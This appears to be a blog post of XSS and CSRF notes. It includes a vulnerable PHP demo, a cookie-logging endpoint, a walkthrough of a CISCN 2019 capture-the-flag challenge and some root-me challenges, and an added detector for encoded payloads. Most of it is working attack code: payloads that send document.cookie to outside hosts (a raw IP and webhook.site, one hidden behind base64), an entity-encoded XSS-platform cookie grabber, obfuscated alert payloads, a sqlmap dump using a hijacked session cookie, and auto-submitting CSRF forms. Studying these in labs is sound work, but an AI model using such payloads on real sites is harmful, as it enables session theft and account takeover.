XSS (Cross-Site Scripting) Attacks: Analysis and Defense
2019-11-19
Cookie spoofing attack
index.php
```php
<?php
setcookie("name", "cookie");
if (isset($_POST['name'])) {
    echo $_POST['name'];   // reflected without any escaping: this is the XSS sink
}
?>
<html>
<body>
<form action="" method="post">
Name: <input type="text" name="name"><br>
<input type="submit">
</form>
</body>
</html>
```
getcookie.php
```php
<?php
$cookie1 = $_GET['cookie'];
$log = fopen("demo.txt", "a");   // append every received cookie to demo.txt
fwrite($log, $cookie1 . "\n");
fclose($log);
?>
```
Payload, entered in the input box:
```html
<script>var img = document.createElement('img');img.src = 'http://localhost/getcookie.php?cookie='+encodeURIComponent(document.cookie);</script>
```
```html
<script>window.location="http://119.91.208.70:4041/"+document.cookie;</script>
```
The cookie is successfully captured in demo.txt.
Some payloads
```html
<img src = "#" onerror=alert(/xss/)>
<img src="x" onerror="alert(1)">
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
original code: <img src="1" onerror=eval("alert('xss')")></img>
<a href="" onclick="alert(1)">aaaaa</a>
<a href="" onclick=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>aaaaa</a>
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src=1 onmouseover=alert('xss') y=2016 /><iframe>
```
CISCN 2019 East-North China regional (华东北赛区), Web2
Approach: submit a post -> feedback -> obtain the admin cookie -> injection
HTML markup encoding
```python
in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();"
output = ""
for c in in_str:
    output += "&#" + str(ord(c))   # decimal character reference for each char, no trailing ';'
print('<svg><script>eval("' + output + '")</script>')
```
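A filter or log-review rule that only matches the literal strings `<script>` or `alert(` misses both encodings used on this page: the `\xNN` escapes inside `eval()` in the payload list above, and the `&#NN` character references produced by the encoding script (which the browser decodes because a `<script>` inside `<svg>` is parsed as foreign content rather than raw text). The Python below is an added detection example, not code from the original post; the sample strings are constructed to mirror this page's payloads, and the indicator list is an illustrative assumption, not an exhaustive signature set.

```python
import html
import re

# Constructed samples modelled on the obfuscated payloads shown on this page,
# plus one benign input that also happens to contain an HTML entity.
SAMPLES = {
    "hex_escape": '<img src="1" onerror=eval("\\x61\\x6c\\x65\\x72\\x74\\x28\\x27\\x78\\x73\\x73\\x27\\x29")>',
    "entity_svg": '<svg><script>eval("&#97&#108&#101&#114&#116&#40&#49&#41")</script></svg>',
    "benign": 'Tom &amp; Jerry wrote: "see you at 10"',
}

# Literal JavaScript \xNN escapes (two hex digits).
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Illustrative indicators a naive filter would look for (assumption, not a full ruleset).
INDICATORS = re.compile(
    r"(?i)<script\b|\bon[a-z]+\s*=|javascript:|\beval\s*\(|\balert\s*\(|document\.cookie"
)


def decode_hex_escapes(s: str) -> str:
    """Replace each \\xNN escape with the character it stands for."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def normalize(s: str, max_rounds: int = 3) -> str:
    """Decode HTML character references (with or without ';', as html.unescape
    accepts both) and \\xNN escapes until the text stops changing, so that
    nested encodings are unwrapped too."""
    for _ in range(max_rounds):
        decoded = decode_hex_escapes(html.unescape(s))
        if decoded == s:
            break
        s = decoded
    return s


def find_indicators(s: str) -> list:
    """Distinct suspicious tokens present after normalization (sorted, lower-case)."""
    return sorted({m.group(0).lower() for m in INDICATORS.finditer(normalize(s))})


def hidden_by_encoding(s: str) -> list:
    """Indicators that appear only after decoding: exactly what a literal-match filter misses."""
    raw = {m.group(0).lower() for m in INDICATORS.finditer(s)}
    return sorted(set(find_indicators(s)) - raw)


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, find_indicators(sample), "hidden:", hidden_by_encoding(sample))
```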
After dropping it onto the XSS platform.
Then brute-force the MD5:
```python
import hashlib

# Find the integer whose MD5 hex digest starts with the given 6-character prefix.
for i in range(1, 10000001):
    s = hashlib.md5(str(i).encode('utf-8')).hexdigest()[0:6]
    if s == "4426f0":
        print(i)
        break
```
Set the admin cookie, guess the backend path, and find that /admin.php is accessible.
Inject to get the flag:
```shell
python sqlmap.py -u http://502ce080-5cd5-4c3d-8467-1fc354132f71.node3.buuoj.cn/admin.php?id=2 --cookie="PHPSESSID=57bd5e76b87b83da7e7332ad6f60cdd7" -T flag --dump --flush-session --fresh-queries --delay 0.1
```
PoC
```html
<script>
image = new Image();
image.src='https://webhook.site/5be08d40-7d3d-42e8-81ed-e476f0fdeaa6?'+document.cookie;
</script>
```
root-me
```html
<img src=x onerror=alert(1)>
http://challenge01.root-me.org:58008/page?user=<img src=x onerror='window.location=atob("aHR0cHM6Ly93ZWJob29rLnNpdGUvNWJlMDhkNDAtN2QzZC00MmU4LTgxZWQtZTQ3NmYwZmRlYWE2").concat("/FETCH?html=").concat(btoa(document.body.innerText))'>
btoa("https://webhook.site/5be08d40-7d3d-42e8-81ed-e476f0fdeaa6")
```
CSRF
CSRF - 0 protection
```html
<form name="csrf" action="http://challenge01.root-me.org/web-client/ch22/?action=profile" method="post" enctype="multipart/form-data">
  <input type="hidden" name="username" value="test">
  <input type="hidden" name="status" value="on">
</form>
<script>document.csrf.submit()</script>

<form name="csrf" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST" enctype="multipart/form-data">
  <input type="text" name="username" value="test" />
  <input type="checkbox" name="status" checked=checked />
  <input type="submit" value="Submit request" />
</form>
<script>document.csrf.submit()</script>

<form name="csrf" action="https://webhook.site/5be08d40-7d3d-42e8-81ed-e476f0fdeaa6/?action=profile" method="post" enctype="multipart/form-data">
  <input type="hidden" name="username" value="test">
  <input type="hidden" name="status" value="on">
</form>
<script>document.csrf.submit()</script>
```